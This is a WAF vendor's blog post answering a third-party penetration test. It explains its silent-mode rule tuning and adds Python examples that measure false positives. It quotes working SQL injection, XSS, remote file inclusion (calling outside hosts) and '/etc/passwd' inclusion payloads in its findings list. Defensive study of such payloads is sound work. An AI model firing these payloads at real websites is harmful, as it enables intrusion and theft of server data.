25 Feb 2013

incapsula-pentested-review

A new comparative study was published last Wednesday by Zero Science Lab, an information security research laboratory that tested the security capabilities of our Web Application Firewall (WAF) together with those of two other vendors, TrustWave (ModSecurity) and CloudFlare.

The study focused on penetration testing of WAF security features and also addressed other factors, like pricing and user experience.

Incapsula scored high in all categories, but the report also included some specific attack vectors that were not detected by our WAF, and we want to address these below. While we are at it, we also want to say something about our security philosophy and our rule generation process.

Our Approach – Balancing Security and Usability

False positives are just as bad as false negatives (not detecting an attack). Beyond the immediate impact on a website’s accessibility, false positives also erode the overall effectiveness of all security measures. Simply put, false alerts cause true alerts to be overlooked, and inflexible features that block legitimate traffic will eventually be shut down.

Incapsula provides business oriented security services. Most of our clients operate commercial websites (eCommerce, SaaS providers, financial and corporate sites, etc.) and they rely on us to provide effective and non-intrusive security.

And so, when implementing new security rules, we follow these acceptance and maintenance principles:

1. Focus on real exploits: We want to provide practical solutions to real-world issues. Some threats are mostly theoretical, others impractical or outdated. When prioritizing tasks, this is a key consideration. (Read more here: WAF Definition - Mind the Gap)

2. Gradual and controlled implementation: Before implementation, new security rules are activated in ‘Silent Mode’, where their would-be effects are tested on thousands of websites and millions of transactions. The results are monitored by our security team and fine-tuned until the number of false positives is reduced to a minimum.

3. Continuous monitoring and fine-tuning: Our security team continuously analyses system reports that measure the false positive rate of each security rule and applies changes to reduce it effectively.

We are always aware of the delicate balance between security and usability. Striking that balance helps us keep our clients safe and keep their business running.
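As an added illustration of the Silent Mode workflow described above (example code written for this page, not Incapsula's own implementation), the Python below runs a few illustrative rules against a small constructed set of labelled requests, tallies what each rule would have blocked, and promotes to blocking mode only the rules whose false-positive rate on legitimate traffic stays within a threshold. The rule patterns, the legitimate traffic, the parameter names other than those in the report, and the threshold are assumptions made here; the attack entries are the SQL injection and RFI payloads quoted later in this post, and the alias URL ending in ‘?’ mirrors the false-positive concern raised in the RFI section.

```python
import re
from urllib.parse import parse_qsl

# Constructed sample of labelled query strings: (query, is_attack). The attack
# entries are payloads quoted in the report; the legitimate ones are made up
# here to represent ordinary search, share and redirect traffic.
TRAFFIC = [
    ("Search2=joxy%27%20group%20by%20testzsl%20having%201=1", True),
    ("cmd2=http://dni.destr0y.net/x.txt?", True),
    ("cmd2=http://96.8.122.139/x.php?????????", True),
    ("Search2=red+shoes+size+42", False),
    ("Search2=group+by+size+having+fun", False),               # natural language hitting SQL keywords
    ("q=how+to+group+by+department+in+excel", False),
    ("redirect=https://mydomain.com/how-to-tie-a-tie?", False),  # alias URL that ends in '?'
    ("share=https://mydomain.com/blog/post-1", False),
]

# Illustrative rules (assumptions of this example, not Incapsula's signatures).
RULES = {
    # First draft: any "group by <x> having" sequence in a parameter value.
    "sqli_groupby_naive": re.compile(r"group\s+by\s+\w+\s+having", re.I),
    # Tuned: the sequence must follow a string-terminating quote and end in a
    # numeric tautology such as "having 1=1".
    "sqli_groupby_tuned": re.compile(
        r"""['"][^&]*?group\s+by\s+\w+\s+having\s+\d+\s*=\s*\d+""", re.I),
    # RFI candidate: an absolute URL ending in one or more '?', the shape of
    # the report's RFI payloads.
    "rfi_url_trailing_q": re.compile(r"^https?://\S+\?+$", re.I),
}


def silent_mode_tally(traffic, rules):
    """Run every rule in silent mode: record what each one would have blocked,
    split into true positives (attacks) and false positives (legitimate)."""
    tally = {name: {"tp": 0, "fp": 0} for name in rules}
    for query, is_attack in traffic:
        # parse_qsl URL-decodes the values, so rules see what the app would see.
        values = [v for _, v in parse_qsl(query, keep_blank_values=True)]
        for name, pattern in rules.items():
            if any(pattern.search(v) for v in values):
                tally[name]["tp" if is_attack else "fp"] += 1
    return tally


def promotion_decisions(tally, traffic, max_fp_rate=0.0):
    """Promote a rule to blocking mode only if it caught at least one attack
    and its false-positive rate over legitimate traffic is within the threshold."""
    legit = sum(1 for _, is_attack in traffic if not is_attack)
    decisions = {}
    for name, counts in tally.items():
        fp_rate = counts["fp"] / legit if legit else 0.0
        ok = counts["tp"] > 0 and fp_rate <= max_fp_rate
        decisions[name] = "promote" if ok else "keep_silent"
    return decisions


if __name__ == "__main__":
    tally = silent_mode_tally(TRAFFIC, RULES)
    for name, decision in promotion_decisions(tally, TRAFFIC).items():
        print(f"{name:22s} tp={tally[name]['tp']} fp={tally[name]['fp']} -> {decision}")
```

On this sample the naive SQL rule and the RFI rule each block one legitimate request and stay in silent mode, while the tuned SQL rule catches the payload with no false positives and is promoted. In production the threshold would be a rate over millions of transactions rather than zero over eight samples; the point is that promotion is a measured decision, not a default.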

Report Findings and Incapsula’s Remediation Measures:

The Zero Science Lab report found several attack vectors that were not detected by our WAF. Some of these are oversights on our part. A few, we believe, are much more theoretical, and dealing with them can cause more harm (false positives) than good.

With that in mind we want to thank Zero Science Lab for its contribution. This new data will help us make Incapsula a little bit better.

SQL Injections

/poc.php?Search2=joxy%27%20group%20by%20testzsl%20having%201=1`

Solution: Patched

XSS Vulnerabilities

/poc.php?x=%3C/h2%3E%3Cinput%20onfocus=prompt%28%27ZSL%27%29;%20autofocus%3E
/poc.php?x=%3C/h2%3E%3Cbody%20oninput=alert%281%29%3E%3Cinput%20autofocus%3E

Solution: Partially Patched

Details: Event-handling JavaScript code is ubiquitous and can be observed in almost every web page. For example, these events are very commonly used for content editing by various plugins and CMSs. To minimize false positives, these security rules need to be delicately balanced. Our early tests showed that indiscriminate JS event blocking rules would create hundreds of false positives in less than an hour. A more lenient rule set has now been introduced, and we will continue to monitor the results.

/poc.php?x=%3C/h2%3E%3Cobject%20data=%22data:text/html;base64,PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg==%22%3E%3C/object%3E

Solution: Patched

Details: We have had a mitigating rule in Silent Mode for several months. During this period the rule spotted no security events but, at the same time, produced several false positives. A more lenient version of the rule has now been promoted to production, and we will continue monitoring it.
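The trade-off described above for event-handler rules, together with the base64 data: URI case just discussed, as an added example (written for this page, not part of the post or of Incapsula's rule set): an indiscriminate rule that flags every on*= attribute is run beside a narrower rule set that flags a handler only when its body calls a probe function such as alert or prompt, or when the same tag self-triggers via autofocus, and both are applied after URL-decoding the value and decoding any base64 data:text/html blob so the script inside the object payload becomes visible. The legitimate samples and both rule sets are assumptions made here; the attack samples are the three report payloads.

```python
import base64
import re
from urllib.parse import unquote

# Constructed labelled samples: (raw parameter value, is_attack). The attack
# entries are the three XSS payloads from the report; the legitimate entries
# are made up here to stand in for ordinary CMS content carrying event handlers.
SAMPLES = [
    ("%3C/h2%3E%3Cinput%20onfocus=prompt%28%27ZSL%27%29;%20autofocus%3E", True),
    ("%3C/h2%3E%3Cbody%20oninput=alert%281%29%3E%3Cinput%20autofocus%3E", True),
    ("%3C/h2%3E%3Cobject%20data=%22data:text/html;base64,"
     "PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg==%22%3E%3C/object%3E", True),
    ('<button class="btn" onclick="toggleMenu()">Menu</button>', False),
    ('<img src="/img/hero.png" onload="lazyInit(this)" alt="">', False),
    ('<input name="q" onchange="validate(this)" autofocus>', False),
    ("Opt-in: set onboarding=done in your profile to skip the tour.", False),
    ("Contact us at support@example.com", False),
]

DATA_URI = re.compile(r"data:text/html;base64,([A-Za-z0-9+/=]+)", re.I)


def normalize(value):
    """URL-decode the value and append the content of any base64 data: URI it
    carries, so the rules see the HTML an <object> would actually render."""
    text = unquote(value)
    for blob in DATA_URI.findall(text):
        try:
            text += "\n" + base64.b64decode(blob, validate=True).decode("utf-8", "replace")
        except ValueError:  # malformed base64: keep the literal text only
            pass
    return text


RULESETS = {
    # Flags any on*= attribute: catches the payloads, but also every
    # legitimate handler and even plain text such as "onboarding=done".
    "indiscriminate": [
        re.compile(r"\bon\w+\s*=", re.I),
        re.compile(r"<script\b", re.I),
    ],
    # Flags a handler only when its body calls a probe/sink function, or when
    # the same tag self-triggers through autofocus; script tags as before.
    "context_aware": [
        re.compile(r"\bon\w+\s*=\s*[\"']?\s*(?:alert|prompt|confirm|eval)\s*\(", re.I),
        re.compile(r"<\w+[^>]*\bon\w+\s*=[^>]*\bautofocus\b", re.I),
        re.compile(r"<script\b", re.I),
    ],
}


def matches(text, patterns):
    return any(p.search(text) for p in patterns)


def silent_mode_report(samples, rulesets):
    """Silent-mode style tally: how many attacks and how many legitimate
    samples each rule set would have blocked."""
    report = {}
    for name, patterns in rulesets.items():
        tp = fp = 0
        for raw, is_attack in samples:
            if matches(normalize(raw), patterns):
                if is_attack:
                    tp += 1
                else:
                    fp += 1
        report[name] = {"tp": tp, "fp": fp}
    return report


if __name__ == "__main__":
    for name, counts in silent_mode_report(SAMPLES, RULESETS).items():
        print(f"{name:15s} tp={counts['tp']} fp={counts['fp']}")
```

Both rule sets catch all three payloads, but the indiscriminate one would have blocked four of the five legitimate samples, while the context-aware set still trips on one: an ordinary autofocus input with an onchange handler. That residual false positive is exactly why a lenient rule goes to production under continued monitoring rather than being declared finished.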

Remote File Inclusion

/poc.php?cmd2=http://google.com?

Solution: Partially Patched

Details: Our concern here is visitor-repelling false positives, because legitimate URL addresses that use aliases will sometimes end with ‘?’ (e.g. mydomain.com/how-to-tie-a-tie?). We are currently testing the remediating rule in Silent Mode and will continue monitoring it before it is deployed.

/poc.php?cmd2=http://dni.destr0y.net/x.txt?
/poc.php?cmd2=http://96.8.122.139/x.php?????????

Solution: Patched

Details: Incapsula doesn’t offer generic RFI protection. Instead, we prefer to maintain application-specific rules that deal with the much more common application-related RFI vulnerabilities. While this was patched, we are aware that the implementation may lead to false positives when forced on applications that use URLs as parameter values. We will continue to monitor the resulting events and modify the rules accordingly.

Local File Inclusion

/poc.php?cmd=cat%20\/etc\/passwd

Solution: Patched